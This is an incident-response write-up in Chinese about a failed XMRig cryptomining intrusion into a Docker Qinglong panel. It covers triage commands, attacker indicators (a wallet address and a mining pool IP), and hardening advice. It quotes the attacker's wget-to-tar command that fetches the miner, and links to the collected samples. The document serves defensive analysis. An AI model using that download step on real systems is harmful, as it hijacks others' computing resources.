Docker青龙面板挖矿入侵事件应急复盘

2026-03-13 00:07:14 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 文档复盘了一起针对Docker青龙面板的挖矿入侵未遂事件。作者通过排查发现攻击者利用漏洞投递XMRig挖矿木马，但因下载失败未造成实际危害。文章详细记录了应急排查过程与攻击者行为特征，分析了恶意样本及持久化手段。最后总结了检查容器状态与异常日志等排查要点，并提出了及时升级与网络隔离等安全加固建议。 综合评分： 88 文章分类： 应急响应,恶意软件,实战经验,漏洞分析

文件存在继续下载行为
这是一个典型的 XMRig 挖矿恶意软件

攻击行为分析

3.1 攻击者行为一览

3.2 攻击者使用的资源

钱包地址：

4AE5D7Fz6dmMQp9Bj7239jdQzGBvPbQgP4bdDr6Y1iXSfTvEqNfHgBMH3ov3AcMy6tJPsZUfYfytUjcKfHjcpzxwPiQy7xP
矿池地址： 104.168.64.199:443

进一步排查

再开始地毯式搜索近期新增文件：

find&nbsp;/ -mtime -9&nbsp;-type f&nbsp;2> /dev/null | grep -v -E&nbsp;"(proc|sys)"&nbsp;| head -50

可以发现异常：发现了华点

/home/.kworker`&nbsp;（8KB，隐藏文件）

根据这个释放的文件可以知道：攻击者执行的这个脚本，将文件都给下载加载到 /tmp/.tmp下了，而且还写日志到了这个目录里。

可以看到，攻击者下载的脚本应该是并未成功执行。如果日志显示和脚本”xmrig 下载失败，退出执行”，那么既不会解压 tar 包残留，也不会生成可执行文件。

至此，再对这个 docker 容器和主机进行排查后，未发现服务器存在其他异常行为。

总结与教训

这应该是很简单的一次批量扫描脚本挖矿攻击。

5.1 攻击者画像

攻击者使用空间搜索引擎搜索青龙面板的资产
然后再利用攻击 POC 脚本对相关资产进行批量扫描攻击
这样的攻击在互联网其实很常见
攻击者使用的脚本含金量基本为0
攻击行径基本透明，甚至攻击脚本都为 AI 写的（中文注释且都没对齐）
只是稍微做了下 history 清除之类的，甚至脚本执行失败了也不管之前释放的 log 文件

5.2 攻击结果

幸运的是：这次攻击并未被成功攻击。攻击失败的原因是：

wget&nbsp;-qO- https://github.com/xmrig/xmrig/releases/download/v6.25.0/xmrig-6.25.0-linux-static-x64.tar.gz | tar -xzf -

GitHub 返回错误导致该次攻击失败。

若被成功攻击，则还需要对服务器进行更详细的排查及考虑重置服务器防止留有后门等。

安全建议

青龙面板该漏洞已经修复，如若还未升级还望各位师傅尽快升级！

容器安全建议

不要挂载 Docker Socket ：这等同于给容器 root 权限，极易造成 docker 逃逸
及时更新：关注青龙面板的最新版本和安全公告
网络隔离：容器网络与宿主机分离
定期巡检：检查容器健康状态和异常日志

入侵排查要点

检查容器健康状态（unhealthy 通常是信号）
查看系统日志中的异常下载行为
排查近期新增的隐藏文件
检查 crontab 持久化任务
关注 /dev/shm 等内存文件系统

本次溯源文件：

https://qianlisecurity.lanzouu.com/b009hwofkj 密码:59mk

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：东方隐侠安全团队蒸梅狸猫蒸梅狸猫《Docker青龙面板挖矿入侵事件应急复盘》